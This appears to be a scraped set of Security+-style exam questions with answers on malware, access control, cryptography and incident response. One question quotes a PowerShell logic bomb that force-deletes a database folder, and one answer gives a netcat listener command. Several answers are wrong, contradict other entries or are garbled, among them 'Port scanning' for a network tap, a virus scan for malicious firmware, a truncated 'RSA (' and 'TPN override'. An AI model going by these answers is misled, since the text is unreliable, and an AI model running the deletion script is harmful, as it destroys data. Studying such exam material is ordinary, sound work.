Key logger

The process of applying a salt and cryptographic hash to a password then repeating the process many times is known as which of the following?

Key stretching

A security administrator is reviewing the following network capture: Which of the following malware is MOST likely to generate the above information?

Keylogger

A systems administrator found a suspicious file in the root of the file system. The file contains URLs, usernames, passwords, and text from other documents being edited on the system. Which of the following types of malware would generate such a file?

Keylogger

Ann, a user, states that her machine has been behaving erratically over the past week. She has experienced slowness and input lag and found text files that appear to contain pieces of her emails or online conversations with coworkers. The technician runs a standard virus scan but detects nothing. Which of the following types of malware has infected the machine?

Keylogger

Scott is the CISO for a bank. In recent readings, he read about an attack where the attacker was able to enumerate all the network resources and was able to make some resources unavailable. All of this was done by exploiting a single protocol. Which protocol would need to be secured to mitigate this attack?

LDAP (Lightweight Directory Access Protocol)

Frank is concerned about an attacker enumerating his entire network. What protocol could help mitigate this issue?

LDAPS

A Chief Financial Officer (CFO) has asked the Chief Information Officer (CISO) to provide responses to a recent audit report detailing deficiencies in the organization's security controls. The CFO would like to know ways in which the organization can improve its authorization controls. Given the request by the CFO, which of the following controls should the CISO focus on in the report? (Select three)

Lease privilege Role-based permissions Separation of duties

You're currently facing a common security issue that's very difficult to control in a large environment. It happens when a user has more privileges than that required for the task the user needs to fulfill. This is the opposite of what principle?

Least Privilege

Josh is responsible for creating new accounts for company network use. What is the most important thing to keep in mind for this process?

Least Privileges

The IT department needs to prevent users from installing untested applications. Which of the following would provide the BEST solution?

Least privilege

Jace manages security at the Ford Company. Lately, he's noticed there have been twenty new employee accounts created and assigned into the default group for the network. He's noticed eight of these have privileges that aren't required for their job task. Which security principle is the best way to avoid this problem in the future?

Least privileges

Company policy requires the use of passphrases instead of passwords. Which of the following technical controls MUST be in place in order to promote the use of passphrases?

Length

During a data breach cleanup, it is discovered that not all sites involved have the necessary data wiping tools. The necessary tools are quickly distributed to the required technicians, but when should this problem BEST be revisited?

Lessons Learned

A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the BEST method of configuring the load balancer?

Locality-based

Your company has implemented a clean desk policy and you were asked to secure physical documents every night. What is the best solution?

Locking Cabinets and drawers

A company is investigating a data exfiltration occurred. Prior to the investigation, the supervisor terminates an employee as a result of the suspected data loss. During the investigation, the supervisor is absent for the interview, and little evidence can be provided from the role-based authentication system in use by the company. The situation can be identified for future mitigation as which of the following?

Log failure

JB is a security administrator for a bank and has discovered a piece of software on the database server that is not supposed to be there. It looks as though the software will begin deleting files if a certain employee is terminated. What best describes this process?

Logic Bomb

Which of the following is describing malware that will be executed and begin some malicious activity when a particular condition is met?

Logic Bomb

A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server: $members = GetADGroupMemeber -Identity "Domain Admins" -Recursive | Select - ExpandProperty name if ($members -notcontains "JohnDoe"){ Remove-Item -path C:\Database -recurse -force } Which of the following did the security administrator discover?

Logic bomb

A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server: Which of the following did the security administrator discover?

Logic bomb

An information security specialist is reviewing the following output from a Linux server (filled with bullshit like "cat" lol) Based on the above information, which of the following types of malware was installed on the server?

Logic bomb

While performing surveillance activities, an attacker determines that an organization is using 802.1X to secure LAN access. Which of the following attack mechanisms can the attacker utilize to bypass the identified network security?

MAC spoofing

You have been tasked with doing a vulnerability assessment on a company's network and determine that they are using 802.1x for secured access. Which of the following can a threat actor use to bypass the current network security?

MAC spoofing

Which is the least secure hashing algorithm?

MD5

Which of the following cryptography algorithms will produce a fixed-length, irreversible output?

MD5

Which of the following is the LEAST secure hashing algorithm?

MD5

Which of the following is used to validate the integrity of data?

MD5

A company has a security policy that specifies all endpoint computing devices should be assigned a unique identifier that can be tracked via an inventory management system. Recent changes to airline security regulations have caused many executives in the company to travel with mini tablet devices instead of laptops. These tablet devices are difficult to tag and track. An RDP application is used from the tablet to connect into the company network. Which of the following should be implemented in order to meet the security policy requirements?

MDM software

Choose an agreement that is not as formal as a traditional contract but still has a level of importance to all involved parties?

MOU (Memorandum of Understanding)

The Chief Technology Officer (CTO) of a company, Ann, is putting together a hardware budget for the next 10 years. She is asking for the average lifespan of each hardware device so that she is able to calculate when she will have to replace each device. Which of the following categories does BEST describe what she is looking for?

MTTF

Which of the following refers to the term used to restore a system to its operational state?

MTTR

Which of the following refers to the term used to restore a system to its operational state?

MTTR (Mean Time to Repair)

A technician is investigating a potentially compromised device with the following symptoms: Browser slowness Frequent browser crashes Hourglass stuck New search toolbar Increased memory consumption Which of the following types of malware has infected the system?

Man-in-the browser

A network administrator is attempting to troubleshoot an issue regarding certificates on a secure website. During the troubleshooting process, the network administrator notices that the web gateway proxy on the local network has signed all of the certificates on the local machine. Which of the following describes the type of attack the proxy has been legitimately programmed to perform?

Main-in-the-middle

Which of the following BEST describes an attack where communications between two parties are intercepted and forwarded to each party with neither party being aware of the interception and potential modification to the communications?

Main-in-the-middle

An incident involving a workstation that is potentially infected with a virus has occurred. The workstation may have sent confidential data to an unknown internet server. Which of the following should a security analyst do FIRST?

Make a copy of everything in memory on the workstation

An incident involving a workstation that is potentially infected with a virus has occurred. The workstation may have sent confidential data to an unknown internet server. Which of the following should a security analyst do FIRST?

Make a copy of everything in memory on the workstation.

A user needs to send sensitive information to a colleague using PKI. Which of the following concepts apply when a sender encrypts the message with the sender's private key? (Select two)

Message integrity Non-repudiation

Of the listed principles, which is not a part of password complexity?

Minimum Password Length

While reviewing the security controls in place for a web-based application, a security controls assessor notices that there are no password strength requirements in place. Because of this vulnerability, passwords might be easily discovered using a brute force attack. Which of the following password requirements will MOST effectively improve the security posture of the application against these attacks? (Select two)

Minimum complexity Minimum length

Refer to the following code: public class rainbow { public static void main (String [] args) { object blue = null; blue.hascode (); } } Which of the following vulnerabilities would occur if this is executed?

Missing null check

A company is performing an analysis of the corporate enterprise network with the intent of identifying what will cause losses in revenue, referrals, and/or reputation when out of commission. Which of the following is an element of a BIA that is being addressed?

Mission-essential function

A company's loss control department identifies theft as a recurring loss type over the past year. Based on the department's report, the Chief Information Officer (CIO) wants to detect theft of data center equipment. Which of the following controls should be implemented?

Motion detectors

Which of the following could help detect trespassers in a secure facility?

Motion-detection sensors Security guards

Which of the following could help detect trespassers in a secure facility? (Select two)

Motion-detection sensors Security guards

You're responsible for server room security. You're concerned about physical theft of computers. Of the following, which would best be able to detect theft or attempted theft?

Motion-sensor activated cameras

Derrick is a security administrator for a medium-sized mortgage company. He needs to verify that the network is using the most secure login/authentication scheme possible. Which of the following options is the best choice for that?

Multi-factor authentication

Which of the following would enhance the security of accessing data stored in the cloud? (Select two)

Multi-factor authentication SAML authentication

Of the following, which is the correct term that is used to describe a virus that can infect both the program files and the boot sectors?

Multipartite

A Chief Information Officer (CIO) drafts an agreement between the organization and its employees. The agreement outlines ramifications for releasing information without consent and/or approvals. Which of the following BEST describes this type of agreement?

NDA

Tina manages security at a medium-sized insurance company. She is concerned with detecting intrusions into the network. Unfortunately, her boss (Jim) doesn't want her to stop any ongoing or attempted intrusions, but instead he just wants her to detect and log them as they occur. Jim also stated that she may only install one intrusion detection or prevention system because he is worried about the cost of installing numerous systems or pieces of software across the network. Tina wants to ensure she still can detect any intrusions that occur within the entire network though. What would best meet the requirements set up by both Tina and Jim?

NIDS (Network Intrusion Detection System)

An organization wants to implement a solution that allows for automated logic controls for network defense. An engineer plans to select an appropriate network security component, which automates response actions based on security threats to the network. Which of the following would be MOST appropriate based on the engineer's requirements?

NIPS

A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for analysis. The analyst notices that an internal host had a socket established with another internal host over a non-standard port. Upon investigation, the origin host that initiated the socket shows this output: Given the above output, which of the following commands would have established the questionable socket?

Nc - 1 192.168.5.1 -p 9856

A security analyst is diagnosing an incident in which a system was compromised from an external IP address. The socket identified on the firewall was traced to 207.46.130.0.6666. Which of the following should the security analyst do to determine if the compromised system still has an active connection?

Netstat

Lori is concerned about DHCP starvation attacks, especially since learning that anyone can download a software called a "gobbler" and use it to execute a DHCP starvation attack. What technology would help mitigate this risk?

Network Address Allocation

A network administrator is creating a new network for an office. For security purposes, each department should have its resources isolated from every other department but be able to communicate back to central servers. Which of the following architecture concepts would BEST accomplish this?

Network segmentation

A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using an old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company. The administrator wants to implement a solution that will eradicate the current worm and any future attacks that may be using zero-day vulnerabilities. Which of the following would BEST meet the requirements when implemented?

Network-based intrusion prevention system

A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using an old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company. The administrator wants to implement a solution that will eradicate the current worm and ant future attacks that may be using zero-day vulnerabilities?

Network-based intrusion prevention system

An organization's internal auditor discovers that large sums of money have recently been paid to a vendor that management does not recognize. The IT security department is asked to investigate the organization's ERP system to determine how the accounts payable module has been used to make these vendor payments. The IT security department finds the following security configuration for the accounts payable module: New Vendor Entry - Required Role: Accounts Payable Clerk New Vendor Approval - Required Role: Accounts Payable Clerk Vendor Payment Entry - Required Role: Accounts Payable Clerk Vendor Payment Approval - Required Role: Accounts Payable Manager Which of the following changes to the security configuration of the accounts payable module would BEST mitigate the risk?

New Vendor Entry - Required Role: Accounts Payable Clerk New Vendor Approval - Required Role: Accounts Payable Manager Vendor Payment Entry - Required Role: Accounts Payable Clerk Vendor Payment Approval - Required Role: Accounts Payable Manager

A software development company needs to share information between two remote servers, using encryption to protect it. A programmer suggests developing a new encryption protocol, arguing that using an unknown protocol with secure, existing cryptographic algorithm libraries will provide strong encryption without being susceptible to attacks on other known protocols. Which of the following summarizes the BEST response to the programmer's protocols.

New protocols often introduce unexpected vulnerabilities, even when developed with otherwise secure and tested algorithm libraries

A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items. Which of the following BEST describe why this has occurred? (Select TWO)

Non-applicable plug ins were selected in the scan policy The incorrect audit file was used

You work for an insurance company as their security administrator. You've noticed that there are a few accounts still active of employees who have been left the company for at least a year. You are worried that someone might attempt to access these accounts. What administrative control could be enabled to help prevent these accounts from remaining online and accessible after an employee leaves the company?

Off-boarding Procedures

A department head at a university resigned on the first day of the spring semester. It was subsequently determined that the department head deleted numerous files and directories from the server-based home directory while the campus was closed. Which of the following policies or procedures could have prevented this from occurring?

Offboarding

When designing a web based client server application with single application server and database cluster backend, input validation should be performed:

On the application server

As the network administrator, you are tasked with adding new employees to the identity and access management system. Which of the following best describes this process?

Onboarding

After a recent internal breach, a company decided to regenerate a.nd reissue all certificates used in the transmission of confidential information. The company places the greatest importance on confidentiality and non-repudiation, and decided to generate dual key pairs for each client. Which of the following BEST describes how the company will use these certificates?

One key pair will be used for encryption and decryption. The other will be used to digitally sign the data.

After a recent internal break, a company decided to regenerate and reissue all certificates used in the transmission of confidential information. The company places the greatest importance on confidentiality and non-repudiation, and decided to generate dual key pairs for each client. Which of the following BEST describes how the company will use these certificates?

One key pair will be used for encryption and decryption. The other will be used to digitally sign the data.

Which of the following works like stream ciphers?

One-Time Pad

An organization wants to utilize a common, internet-based third-party provider for authorization and authentication. The provider uses a technology based on OAuth 2.0 to provide required services. To which of the following technologies is the provider referring?

Open ID Connect

Natalie is responsible for the security of web servers and is configuring the WAF to allow only encrypted traffic to and from the web server, including from administrators using the command-line interface. What should she do?

Open port 443 and 22 and block 80 and 23

A systems administrator wants to provide balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security backward compatibility when accessing the wireless network?

Open shares VPN and SSL

Matthew is working to select an authentication method for his company that will support REST as well as many web-based and mobile clients. Which of the following would be the best choice?

OpenID Connect

an organization wants to utilize a commonInternet-based third-party provider for authorization and authentication. The provider Uses a technology based OAuth 2.0 toProvide required services. To which of the following technology is the provider referring?

OpenID connect

A datacenter manager has been asked to prioritize critical system recovery priorities. Which of the following is the MOST critical for immediate recovery?

Operating system software

Joe a computer forensic technician responds to an active compromise of a database server. Joe first collects information in memory, then collects network traffic and finally conducts an image of the hard drive. Which of the following procedures did Joe follow?

Order of volatility

Kaye works for a large insurance company and manages their cybersecurity. She's concerned about insiders and wants to be able to detect malicious activity but wants the detection process to be invisible to the attacker. What technology best fits these needs?

Out-of-band NIDS

Which of the following delineates why it is important to perform egress filtering and monitoring on internet connected security zones of interfaces on a firewall?

Outbound traffic could be communicating to known botnet sources

An in-house penetration tester has been asked to evade a new OLP system. The tester plans to exfiltrate data through steganography. Discovery of which of the following would help catch the tester in the act?

Outgoing emails containing unusually large image files

An in-house penetrations tester has been asked to evade a new DLP system. The tester plans to exfiltrate data through steganography. Discovery of which of the following would help catch the tester in the act?

Outgoing emails containing unusually large image files

An information security analyst needs to work with an employee who can answer questions about thow data for a specific system is used in the business. The analyst should seek out an employee who has the role of:

Owner

Ann is the IS manager for several new systems in which the classification of the systems' data are being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification?

Owner

Ann is the IS manager for several new systems in which the classifications of the systems' data are being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification?

Owner

A company is currently using the following configuration: IAS server with certificate-based EAP-PEAP and MSCHAP A security administrator needs to configure a new wireless setup with the following configurations: PAP authentication method PEAP and EAP provide two-factor authentication Which of the following forms of authentication is being used? (Select two)

PAP MSCHAP

A Chief Information Officer (CIO) recently saw on the news that a significant security flaws exists with a specific version of a technology the company uses to support many critical applications. The CIO wants to know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information?

Penetration test

A security program manager wants to actively test the security posture of a system. The system is not yet in production and has no uptime requirement or active user base. Which of the following methods will produce a report which shows vulnerabilities that were actually exploited?

Penetration testing

An attacker captures the encrypted communication between two parties for a week, but is unable to decrypt the messages. The attacker then compromises the session key during one exchange and successfully compromises a single message. The attacker plans to use this key to decrypt previously captured and future communications, but is unable to. This is because the encryption scheme in use adheres to:

Perfect forward secrecy

A portable data storage device has been determined to have malicious firmware. Which of the following is the BEST course of action to ensure data confidentiality?

Perform virus scan in the device

A company exchanges information with a business partner. An annual audit of the business partner is conducted against the SLA in order to verify:

Performance and service delivery metrics

Sharon is worried that some people in her company have more access privileges than they need. This concern came from people moving from one position to another while keeping their other rights, which exceed the requirements of the current position. Which of the following is the most effective in mitigating this issue?

Permission auditing

You work for a company that is issuing portable devices to employees for both work and personal use. The company is doing this so they can control the security of the devices. As an employee, what issue is raised by using a company-owned device for your work-related data and personal use?

Personal information being exposed

What of the following security controls does an iris scanner provide?

Physical

Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe, decides to connect to the airport wireless network without connecting to a VPN,and the sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused the data breach?

Policy violation

Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused the data breach?

Policy violation

What type of virus can alter its own code to avoid being detected by an antivirus?

Polymorphic Virus

Malware that changes its binary pattern on specific dates at specific times to avoid detection is known as:

Polymorphic virus

A web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered an information loss breach. Which of the following is MOST likely the cause?

Poor implementation

A company recently experienced data exfiltration via the corporate network. In response to the breach, a security analyst recommends deploying an out-of-band IDS solutions. The analyst says the solution can be implemented without purchasing any additional network hardware. Which of the following solutions will be used to deploy the IDS?

Port mirroring

A security analyst has set up a network tap to monitor network traffic for vulnerabilities. Which of the following techniques would BEST describe the approach the analyst has taken?

Port scanning

A security analyst captures forensic evidence from a potentially compromised system for further investigation. The evidence is documented and securely stored to FIRST?

Preserve the data

Peter is trying to block unauthorized access to desktop computers inside the company network. He's configured the OS to lock after 5 minutes of inactivity. What type of security control has been implemented?

Preventative

Your security policy is set to include system testing and security awareness training guidelines. Which of the following types of control is this?

Preventative Administrative Control

Marsha is supposed to be receiving a document from Laura and wants to be able to identify that the document came from her. What should Laura use to make a digital signature on the document?

Private Key

You have an email that you are sending to a friend. You want to ensure it retains its integrity during transit, so you decide to digitally sign the email. When using a PKI system, what is used to encrypt the hash digest of the email to create a digital signature?

Private Key

Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? (Select two)

Private key Public key

During a penetration test, you were given a login name with minimal access and attempted to gain administrative access with this account. What is this called?

Privilege Escalation

A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server domain. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack?

Privilege escalation

Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS?

Privilege escalation

Which of the following types of attacks precedes the installation of a rootkit on a server?

Privilege escalation

A buffer overflow can result in:

Privilege escalation caused by TPN override

An organization has an account management policy that defines parameters around each type of account. The policy specifies different security attributes, such as longevity, usage auditing, password complexity, and identity proofing. The goal of the account management policy is to ensure the highest level of security while providing the greatest availability without compromising data integrity for users. Which of the following account types should the policy specify for service technicians from corporate partners?

Privileged user account

Of the listed principles, which one is typically included in a BPA?

Profit sharing / losses and the addition/subtraction of a partner

You are responsible for the web application security for your company's e-commerce server. You're especially concerned with XSS and SQL injection. Of the following, which technique would be the most effective at mitigating these attacks?

Proper input Validation

In asymmetric encryption, what is used to decrypt a file that was encrypted using a private key?

Public Key

Ann, security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements?

Public key Private Key

Joe recently assumed the role of data custodian for this organization. While cleaning out an unused storage safe, he discovers several hard drives that are labeled "unclassified" and awaiting destruction. The hard drives are obsolete and cannot be installed in any of his current computing equipment. Which of the following is the BEST method for disposing of the hard drives?

Pulverizing

Your company has purchased new laptops for your salespeople. Your IT department plans to dispose of the hard drives from the old computers as part of a sale. Which method would you use to properly dispose of the hard drives?

Purging

A company is deploying a new VoIP phone system. They require 99.99% uptime for their phone service and are concerned about their existing data network interfering with the VoIP phone system. The core switches in the existing data network are almost fully saturated. Which of the following options will provide the best performance and availability for both the VoIP traffic, as well as the traffic on the existing data network?

Put the VoIP network into a different VLAN than the existing data network

Which listed technique attempts to predict the likelihood of a threat occurrence and assigns monetary values in the event of a loss?

Quantitative Risk Assessment

You've been tasked with identifying which risks to mitigate based on cost. What is this an example of?

Quantitative Risk Assessment

A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?

RAT

Which of the following is a document that contains detailed information about actions that include how something will be done, when the actions will be performed, and penalties for failure?

SLA

A company wants to provide centralized authentication for its wireless system. The wireless authentication system must integrate with the directory back end. Which of the following is a AAA solution that will provide the required wireless authentication?

RADIUS

A system administrator needs to implement 802.1x whereby when a user logs into the network, the authentication server communicates to the network switch and assigns the user to the proper VLAN. Which of the following protocols should be used?

RADIUS

Mark is working to set up remote access for the salespeople in his company. Which protocol is most suited for this?

RADIUS

Which of the following has cross-platform support and is used remote access into a network?

RADIUS

An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Select two)

RADIUS TACACS+

A systems administrator wants to implement a wireless protocol that will allow the organization to authenticate mobile devices prior to providing the user with a captive portal login. Which of the following should the systems administrator configure?

RADIUS federation

Multiple organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all the organizations use the native 802.1x client on their mobile devices?

RADIUS federation

Multiple organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all the organizations use the native 802.1x client on their mobile devices?

RADIUS federation

Of the following RAID levels, which one is considered a "stripe of mirrors"?

RAID 1+0

You are concerned about fault tolerance for the database server you manage. You need to ensure that if a single drive fails, the data can be recovered. What RAID level would be used to support this goal while simultaneously distributing parity bits?

RAID 5

When performing data acquisition on a workstation, which of the following should be captured based on memory volatility? (Select two)

RAM Swap/pagefile

A user downloads and installs an MP3 converter, and run the application. Upon running the application, the antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?

RAT

Which of the following strategies should a system architect use to minimize availability risks due to insufficient storage capacity?

Scalability

After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below: c:\Windows\system32>netstat -nab Active Connections Pronto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchoat.exe] TCP 0.0.0.0:445 0.0.0.0 [svchost.exe] TCP 192.168.1.10:5000 10.37.213.20 winserver.exe UDP 192.168.1.10:1900 *.* SSDPSVR Based on the above information, which of the following types of malware was installed on the user's computer?

RAT

Of the following, which best describes software that provides an attacker with remote access to a victim machine, but it's wrapped with a legitimate program in an attempt to trick the victim into installing the application?

RAT (Remote Access Trojan)

Which of the following provides an example of stream cipher?

RC4 (Rivest Cipher 4)

Which one uses two mathematically-related keys to secure the data during transmission?

RSA (

An organization has determined it can tolerate a maximum of three hours of downtime. Which of the following has been specified?

RTO

Which of the following describes the maximum amount of time a mission essential function can operate without the systems it depends on before significantly impacting the organization?

RTO

Trent noticed that a web application used by his company doesn't handle multithreading properly. This could allow an attacker to exploit this vulnerability and crash the server. What type of error was discovered?

Race Conditions

A security administrator is given the security and availability profiles for servers that are being deployed. Match each RAID type with the correct configuration and MINIMUM number of drives. Review the server profiles and match them with the appropriate RAID type based on integrity, availability, I/O, storage requirements.

Raid 0 = Media and stripe data x2; Raid 1= authentication and mirror x2; Raid 5 = email and stripe data x3; Raid 6 = identity and stripe data x4

Which of the following characteristics differentiate a rainbow table attack from a brute force attack? (Select two)

Rainbow table attacks bypass maximum failed login restrictions Rainbow tables must include precomputed hashes

Which of the following cryptographic attacks would salting of passwords render ineffective?

Rainbow tables

Which of the following uses precomputed hashes to guess passwords?

Rainbow tables

After surfing the internet, Joe, a user, woke up to find all his files were corrupted. His wallpaper was replaced by a message stating the files were encrypted and he needed to transfer money to a foreign country to recover them. Joe is a victim of:

Ransomware

Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred?

Ransomware

Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred?

Ransomware

A security engineer is faced with competing requirements from the networking group and database administrators. The database administrators would like ten application servers on the same subnet for ease of administration, whereas the networking group would like to segment all applications from one another. Which of the following should the security administrator do to rectify this issue?

Recommend classifying each application into like security groups and segmenting the groups from one another

A penetration tester is crawling a target website that is available to the public. Which of the following represents the actions the penetration tester is performing?

Reconnaissance

Which of the following penetration testing concepts is being used when an attacker uses public internet databases to enumerate and learn more about a target?

Reconnaissance

Multiple employees receive an email with a malicious attachment that begins to encrypt their hard drives and mapped shares on their devices when it is opened. The network and security teams perform the following actions: Shut down all network shares Run an email search identifying all employees who received the malicious message Reimage all devices belonging to users who opened the attachment Next, the teams want to re-enable the network shares. Which of the following BEST describes this phase of the incident response process?

Recovery

While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation from the original media. Joe is about to begin copying the user's files back onto the hard drive. Which of the following incident response steps is Joe working on now?

Recovery

While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation from the original media. Joe is about to begin copying the user's files back onto the hard drive. Which of the following incident response steps is Joe working on now?

Recovery

Which of the following BEST describes a network-based attack that can allow an attacker to take full control of a vulnerable host?

Remote exploit

A security analyst is investigating a potential breach. Upon gathering, documenting, and securing the evidence, which of the following actions is the NEXT step to minimize the business impart?

Remove malware and restore the system to normal operation

A new security policy in an organization requires that all file transfers within the organization be completed using applications that provide secure transfer. Currently, the organization uses FTP and HTTP to transfers files. Which of the following should the organization implement in order to be compliant with the new policy?

Replace FTP with SFTP and replace HTTP with TLS

A security administrator is reviewing the following firewall configuration after receiving reports that users are unable to connect to remote websites: Which of the following is the MOST secure solution the security administrator can implement to fix this issue?

Replace rule number 10 with the following rule: 10 permit from:any to:any port:22

Alissa has deployed session tokens on her network. What would these tokens be the most effective in protecting against?

Replay

An attacker uses a network sniffer to capture the packets of a transaction that adds $20 to a gift card. The attacker then uses a function of the sniffer to push those packets back onto the network again, adding another $20 to the gift card. This can be done many times. Which of the following describes this type of attack?

Replay attack

An external auditor visits the human resources department and performs a physical security assessment. The auditor observed documents on printers that are unclaimed. A closer look at these documents reveals employee names, addresses, ages, and types of medical and dental coverage options each employee has selected. Which of the following is the MOST appropriate actions to take?

Report to the human resources manager that their personnel are violating a privacy policy

A bank requires tellers to get manager approval when a customer wants to open a new account. A recent audit shows that there have been four cases in the previous year where tellers opened accounts without management approval. The bank president thought separation of duties would prevent this from happening. In order to implement a true separation of duties approach the bank could:

Require all new accounts to be handled by someone else other than a teller since they have different duties

A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices?

Require applications to be digitally signed.

Peter noticed some users on the company network frequently have simple passwords that are made up of common words, therefore, known as weak passwords. How could this be mitigated?

Require password complexity

A Chief Executive Officer (CEO) suspects someone in the lab testing environment is stealing confidential information after working hours when no one else is around. Which of the following actions can help to prevent this specific threat?

Require swipe-card access to enter the lab

Which of the following is a compensating control that will BEST reduce the risk of weak passwords?

Requiring the use of one-time tokens

Which of the following BEST describes an important security advantage yielded by implementing vendor diversity?

Resiliency

Which of the following BEST describes an important security advantage yielded by implementing vendor diversity?

Resiliency

A company is deploying smartphones for its mobile salesforce. These devices are for personal and business use but are owned by the company. Sales personnel will save new customer data via a custom application developed for the company. This application will integrate with the contact information stored in the smartphones and will populate new customer records onto it. The customer application's data is encrypted at rest, and the application's connection to the back office system is considered secure. The Chief Information Security Officer (CISO) has concerns that customer contact information may be accidentally leaked due to the limited security capabilities of the devices and the planned controls. Which of the following will be the MOST efficient security control to implement to lower this risk?

Restrict contact information storage dataflow so it is only shared with the customer application.

When attempting to secure a mobile workstation, which of the following authentication technologies rely on the user's physical characteristics? (Select TWO)

Retina scan Fingerprint scan

For each of the given items, select the appropriate authentication category from the dropdown choice:

Retina scan = something you are Smart card = something you have Hardware token = something you have Password = something you know PIN number = something you know Fingerprint scan = something you are

David, a programmer, is using the waterfall method for application development. Using this method, at which phase of the SDLC can he stop implementing security measures?

Retirement

A security analyst is investigating a potential reach. Upon gathering, documenting, and securing the evidence, which of the following actions is the NEXT step to minimize the business impact?

Review lessons learned captured in the process

A local competitor is offering a new service that is predicted to sell strong. After much research, your company has decided not to launch a competing service due to the uncertainty of the market and the large investment required. Which best describes your company's decision?

Risk Avoidance

A security architect has convened a meeting to discuss an organization's key management policy. The organization has a reliable internal key management system, and some argue that it would be best to manage the cryptographic keys internally as opposed to using a solution from a third party. The company should use:

Risk benefits analysis results to make a determination

Wanda is responsible for network connectivity for her company. The sales department is transitioning to VoIP. What two protocols must be allowed through the firewall for this to be successful?

SIP and RTP

A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install?

Rogue system detection

A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install?

Rogue system detection

Joe, an employee, wants to show his colleagues how much he knows about smartphones. Joe demonstrates a free movie application that he installed from a third party on his corporate smartphone. Joe's colleagues were unable to find the application in the app stores. Which of the following allowed Joe to install the application? (Select two)

Rooting/jailbreaking Sideloading

A technician suspects that a system has been compromised. The technician reviews the following log entry: Based solely on the above information, which of the following types of malware is MOST likely installed on the system?

Rootkit

An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned network can be seen sending packets to the wrong gateway. Which of the following network devices is misconfigured and which of the following should be done to remediate the issue?

Router, place the correct subnet on the interface

A supervisor in your organization was demoted on Friday afternoon. The supervisor had the ability to modify the contents of a confidential database, as well as other managerial permissions. On Monday morning, the database administrator reported that log files indicated that several records were missing from the database. Which of the following risk mitigation strategies should have been implemented when the supervisor was demoted?

Routine auditing

An administrator is configuring access to information located on a network file server named "Bowman". The files are located in a folder named "BalkFiles". The files are only for use by the "Matthews" division and should be read-only. The security policy requires permissions for shares to be managed at the file system layer and also requires those permissions to be set according to the least privilege model. The security policy for this data type also dictates that administrator-level accounts on the system have full access to the files. The administrator configures the file share according to the following table: (4 bowman\system full control inherited) Which of the following rows has been misconfigured?

Row 4

A Chief Security Officer(CSO) has been unsuccessful in attempts to access the website for a potential partner (www example net) Which of the following rules is preventing the CSO from accessing the site? Blocked sites: *.nonews, *rumorhssit, *.mars?

Rule 3: deny from inside to outside source any destination (blocked sites) service http-https

You are the security administrator for a large company where occasionally, a user needs to access certain resources that the user doesn't have permission to access. Which method would be the most beneficial?

Rule-Based Access Control

To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed?

Separation of duties

During a recent audit, several undocumented and unpatched devices were discovered on the internal network. Which of the following can be done to prevent similar occurrences?

Run weekly vulnerability scans and remediate any missing patches on all company devices

Confidential emails from an organization were posted to a website without the organization's knowledge. Upon investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails in plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented the emails from being sniffed? (Select TWO)

S/MIME SMTPS

A web developer improves client access to the company's REST API. Authentication needs to be tokenized but not expose the client's password. Which of the following methods would BEST meet the developer's requirements?

SAML

A web developers improves clients access to the company's REST API. Authentication needs to be tokenized but not expose the client's password. Which of the following methods would BEST meet the developer's requirements?

SAML

Which of the following allows an application to securely authenticate a user by receiving credentials from a web domain?

SAML

Which of the following is commonly used for federated identity management across multiple organizations?

SAML

Lonnie has been assigned the task of choosing a backup communication method for his company in the case of a disaster that disrupts normal communication. Which option provides the most reliability?

SATCOM

A company was recently audited by a third party. The audit revealed the company's network devices were transferring files in the clear. Which of the following protocols should the company use to transfer files?

SCP

